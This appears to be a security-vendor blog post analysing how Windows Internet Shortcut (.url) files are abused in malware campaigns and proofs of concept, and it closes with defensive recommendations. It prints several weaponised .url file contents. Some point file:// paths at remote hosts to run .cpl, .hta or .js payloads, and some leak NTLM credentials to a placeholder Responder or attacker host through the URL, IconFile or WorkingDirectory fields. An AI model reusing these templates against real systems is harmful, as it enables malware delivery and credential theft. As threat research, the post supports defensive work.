Shortcut To Malice: URL Files – InQuest

Internet Shortcut files, or URL files, present an interesting opportunity to reflect on how unextraordinary file types present security risks and become an enabling technology for criminal activity when coupled with the right vulnerabilities. At InQuest, we specialize in adversaries’ abuse of complex, evasive file types for malicious ends, helping customers with solutions that are optimized to provide resilient countermeasures against cybersecurity threats. But not every weaponized file has to meet a high bar of complexity or sophistication to be a risk. Like gadgets in a ROP chain, some files are simple but provide value as a component in a threat sequence. InQuest notes that increasing numbers of adversary groups are leveraging complex file tradecraft at a greater frequency as they target interests globally, as seen with both cybercriminal groups as well as strategically focused nation-state threat groups. 

In this post, we’ll explore URL files, and the resurgence they’ve had in the threat space as various vulnerabilities and exposures have led to adversaries finding utility in this simple file type.

Overview of URL files

Before looking at the misuse of URL files, let’s clarify what they are.

Internet Shortcut files are a text-based file format that provide a similar function to other shortcut files, such as Shell Link (LNK) files, except that they’re designed to point to network resources, such as web URLs. The key use case for these files in Windows is saving a clickable shortcut on the user’s Desktop that can be opened to take them to a target URL or web application. URL files are generally not a well-documented file format, being a legacy Windows Shell feature and having been a supported shortcut file type in Windows for a long while. The URL file format was unofficially documented at least as far back as 1998.

Internet Shortcut files are given the .url extension, leading to the nickname “URL files.” In reality, they are simple text-based files in the INI format, with a simple structure that can be extended through metadata and special data value encoding. Associated APIs are available in the operating system for creating and reading URL files. The most basic file consists of a single header and the required URL property, for example:

[InternetShortcut]

URL=https://inquest.net/

As seen in the example, a URL file can be very brief, and the only required section and option are [InternetShortcut] and URL. It is with this basic format in mind that we can begin to explore how the threat space around URL files has expanded over the years.

URL files in malicious contexts

URL files have been featured recently in threat campaign activity. A recent uptick in activity originating in October of last year, as reported by Proofpoint, consisted of threat actors distributing first the DarkGate trojan, later followed by the NetSupport RAT to victims. Later, in mid-January, Trend Micro noted an active campaign pushing a variant of an information stealing (stealer) trojan called Phemedrone to victims. In each of these cases, multi-stage threat sequences were utilized, and the threat actors integrated URL files as components of the attack.

As documented by sources, the URL files distributed in these attacks had a specific purpose; they were used due to exploitation of CVE-2023-36025, a vulnerability in Windows that enabled a bypass of SmartScreen – effectively a Defense Evasion due to security control bypass. By using crafted URL files, adversaries can trigger a chain of downloads of malicious files without arousing user suspicions with warning alerts about untrusted content.

To understand this more fully, we should look back at the example of the basic Internet Shortcut file:

[InternetShortcut]

URL=https://inquest.net/

As noted in the unofficial documentation, the protocol prefix utilized in the URL value isn’t limited to http or https for a remote prefix; various supported protocols may be specified. To see an example of this, we can look at a sample from the recent Phemedrone distribution campaign: 69941417f26c207f7cbbbe36ce8b4d976640a3d7f407d316932428e427f1980b.

[{000214A0-0000-0000-C000-000000000046}]

Prop3=19,9

[InternetShortcut]

IDList=

URL=file://51.79.185[.]145/pdf/data1.zip/pdf1.cpl

IconIndex=13

HotKey=0

IconFile=C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe

This malicious URL file uses a file:// prefix for the path, which is notable and relates to the security control paypass. Let’s clarify the important attributes of this URL:

  1. The prefix is file://, typically indicating a reference to a locally accessible file path.
  2. However, the referenced path is on a network location, a remote (untrusted) IP address.
  3. The target of the referenced path is a .cpl file, or a Control Panel applet, which is an executable file type.
  4. The path to the .cpl file in the URL is inside of a ZIP archive, an unusual construct supported in Windows so that Explorer and other components can abstract a ZIP file as a directory part.

Put together, we can see the value of a security feature bypass like CVE-2023-36025; the ability to kick off a malicious content execution chain from a directly executable file type like a .cpl (DLL) file without pesky controls interrupting it or flagging it for the user is attractive to criminal actors.

It’s also worth noting that this particular offensive tradecraft space is not generally isolated to these recent campaigns, nor the recent security feature bypass vulnerability. If we look back through time, we see a period of several years where different aspects related to the feature space surrounding URL files and how related attack surface is exploited becomes apparent.

CVE-2016-3353 Internet Explorer Security Feature Bypass Vulnerability

As far back as 2016, a different vulnerability surfaced, affecting Internet Explorer and addressed by Microsoft in MS16-104. The advisory for CVE-2016-3353 doesn’t go into significant detail, but hints at the significance of URL files in the exploit scenario (emphasis added):

> In a web-based attack scenario, an attacker could host a malicious website that is designed to exploit the security feature bypass. Alternatively, in an email or instant message attack scenario, the attacker could send the targeted user a specially crafted .url file that is designed to exploit the bypass.

> The update addresses the security feature by correcting how Internet Explorer handles .URL files.

This vulnerability was later analyzed by Quarkslab, making it clear that the nature of this security feature bypass has to do with handling of .url files and honoring the Mark-of-the-Web (MOTW), which places it into familiar territory with misuse of other features and surfaces that are susceptible to MOTW bypass such as abused container file formats (IMG, ISO, VHD, VHDX, etc.).

The proof of concept from researchers also shows a remarkable similarity to the more recent case of CVE-2023-36025:

[{000214A0-0000-0000-C000-000000000046}]

Prop3=19,9

[InternetShortcut]

IDList=

URL=file:///192.168.1[.]100sharetest.zipms16-104.hta

The above URL file shares each characteristic we enumerated earlier for the weaponized sample from recent malware distribution activity; the file:// prefix, an untrusted remote host, an executable file content target, and even the pathing inside of a ZIP archive. The primary difference is that the attack surface differs in these cases; in 2016, Microsoft considered and addressed flaws within Internet Explorer (ieframe.dll), while more modern iterations of this now affect Windows core components.

2018 malware distribution activity

Vulnerabilities leading to security feature bypasses do not present the only opportunities to weaponize URL files; in fact, threat actors are more than happy to utilize components in attacks that do result in warning notices to users. A content risk warning is an important countermeasure, but coupled with convincing social engineering content, may not be enough to persuade a person that content is malicious. In early 2018, SANS ISC and Cofense described a phishing-based attack where threat actors leveraged URL files in conjunction with JavaScript-based downloaders to distribute malware, including the Quant Loader trojan. URL file samples resembled the following:

[{000214A0-0000-0000-C000-000000000046}]

Prop3=19,9

[InternetShortcut]

IDList=

URL=file://buyviagraoverthecounterusabb[.]net/documents/I57677294166.js

HotKey=0

IconIndex=3

IconFile=C:WindowsSystem32shell32.dll

In this case, researchers noted that the URL files resulted in users receiving untrusted file warnings. It may be the case that this occurred on systems that were patched from previous vulnerabilities such as CVE-2016-3353; unpatched users may have encountered a different experience. In this case, the URL path target is set up to pull content from an SMB share. The ability for internal devices on trusted networks to connect to and retrieve content from remote SMB services presents a significant risk in itself, regardless of any type of untrusted content warning that may or may not be displayed.

Information leakage and credential data exposures

Another contribution to the big picture of URL file abuse occurred in 2018, and this time concerning information leakage and the potential for URL files to play a role in capturing of authentication and credential material by remote attackers.

In May, Securify noted several ways that subsystems in Windows could be tricked into sending a user’s NTLM credentials to an attacker-controlled host. They disclosed two methods using URL files, such as this simple method simply using the file:// prefix to reference a remote file:

[InternetShortcut]

URL=file://<responder ip>/leak/leak.html

…as well as this sample, using the IconFile option to trigger the URL handler to retrieve a remote icon file for extraction of an image to render:

[InternetShortcut]

URL=https://securify.nl

IconIndex=0

IconFile=<responder ip>leakleak.ico

In the case of the second one, it becomes clear that there are many elements of concern, including the optionality of a protocol prefix, interchangeable use of forward- or back-slashes, and the overall persistence of SMB as an unintended channel of privilege elevation through risky access to attacker infrastructure converge in what is common seen attack surface in the operating system. This same approach of using the IconFile option for credential access was also discussed by Alex Inführ at a later time. As noted, when these URL files are activated, SMB connections to the remote servers are initiated, resulting in the authentication exchange and disclosure of NTLM credential data to the attacker. The common adversarial toolkit used on the remote end of these types of attacks by numerous threat actors is Responder.

DLL side-loading using URL files

Another aspect of abuse potential for URL files was disclosed by Inführ in discussion of abusing fields in the files to execute untrusted code through DLL side-loading. In this proof of concept, a URL file is used to point to a local executable file that is vulnerable to DLL search path hijacking; upon activating the URL file, the WorkingDirectory option is processed, leading to the search path for loaded DLL being set to include an attacker-controlled directory on a remote SMB share.

[InternetShortcut]

URL=C:windowsWinSxSx86_netfx4-mscorsvw_exe_b03f5f7f11d50a3a_4.0.15655.0_none_c11940453f42e667mscorsvw.exe

WorkingDirectory=attacker[.]comSMBShare

URL files for malware persistence

As documented in malware campaigns such as Zscaler ThreatLabz’ analysis of DBatLoader being used to distribute Remcos and Formbook RATs, URL files are a shortcut file that can also be used for execution on a system. When linked to autostart locations, these files also support a means of persistence to enable malware to execute after reboot or login. The following URL file was used in the case of this distribution campaign, enabling startup of the malware payload in Xdfiifag.exe.

[InternetShortcut]

URL=file:"C:UsersPublicLibrariesXdfiifag.exe"

IconIndex=13

HotKey=49

2023 malware distribution activity

In June 2023, @AnFam17 shared information about a social engineering-based landing traffic redirector distributing users to loads of the NetSupport RAT, again notably through URL files. The upstream social engineering-based landing pages were tied to a kit known as FakeSG. Sample URL file (Install Updater (msi-stable(V102.84.3348).url):

[InternetShortcut]

URL=file:94.158.247.6@80Downloadsupdatermsi.hta

ShowCommand=7

IconIndex=247

IconFile=C:WindowsSystem32shell32.dll

This URL file illustrates, similar to prior iterations, that the file:// protocol prefix may be represented with a high level of flexibility, here using backslashes rather than forward slashes, and highlighting an aspect that can be challenging for detection engineers. It’s worth noting here that also similar to previously mentioned URL files using file prefixes, there is an inherent inconsistency occurring. In the case of these URLs, the attacker is hosting the payloads on a WebDAV server, leading to the content being retrieved not using SMB, but instead over HTTP using the WebDAV protocol on port 80/tcp. Reports have noted in these cases that the operating system will initially attempt to communicate using SMB with the remote service, and failing this, will then resort to using the WebDAV protocol.

Another notable instance in the nexus of this topic occurred around the disclosure of another high-profile vulnerability, CVE-2023-36884, publicly disclosed in July of 2023. This was at the time a 0-day vulnerability that had been reported as utilized in targeted attack campaigns, utilized by a threat group for distribution of a modified variant of the RomCom RAT. The complex, multi-stage threat chain returned focus to the topic of URL file handling and surfaced observations of uncheck remote code execution when a payload is loaded from a ZIP archive path accessed over WebDAV.

Parting thoughts

With this retrospective into the abuse space of Internet Shortcut (URL files), we can see that for a period of years, they have played a role in the threat landscape, albeit a supporting role, and seldom the leading star of the show. Oftentimes, enabling technologies and security feature bypasses are ranked as low severity vulnerabilities, and are sometimes even disregarded as non-security bugs, not making it to the level of CVE acceptance by vendors.

Many times as threat analysts, we prioritize the most obvious culprit in threat sequences, placing most emphasis on end payloads and how attackers action on objective. However, it is important to note that today’s adversaries have come to realize that raised costs from attack surface reduction can be met by increasingly complex file-based tradecraft, and attack sequences using URL files are often a good indicator of their use in such attack chains. 

InQuest recommends that organizations maintain focus in this space of complex and multi-layered file-based tradecraft. 

  • Monitor for access attempts to remote URL files. Organizations may find it feasible to block access to remotely hosted URL files.
  • Analyze and inspect targets in URL files encountered in the environment, looking for those abusing the features of file:// based protocols, those referencing external SMB or WebDAV pathways, and other anomalies in URL, IconFile and WorkingDirectory fields
  • Monitor and validate outbound SMB and WebDAV sessions with external, untrusted infrastructure. Note that a number of services and cloud storage solutions supporting WebDAV are available and have been abused in threat campaigns, including 4shared, DriveHQ and OpenDrive. These services provide attackers with publicly available and non-attributable services that can be exploited in targeting of potential victims.
  • Block connections to external SMB services. Years of associated threat activity have shown this to be a continual source of pain for information leakage, remote code execution, and related risks. Future attacks are likely to continue to weaponize these sorts of tactics, especially against legacy OS versions, and controls such as these can help detect and disrupt unknown threats in these cases.
  • Leverage FileTAC, with our state-of-the-art Deep File Inspection® and RetroHunt® technology, to scan deeper and expose more file-borne attacks than any other solution.

References

InQuest has also collected a number of sample URL files in our GitHub repository.

Source: https://inquest.net/blog/shortcut-to-malice-url-files/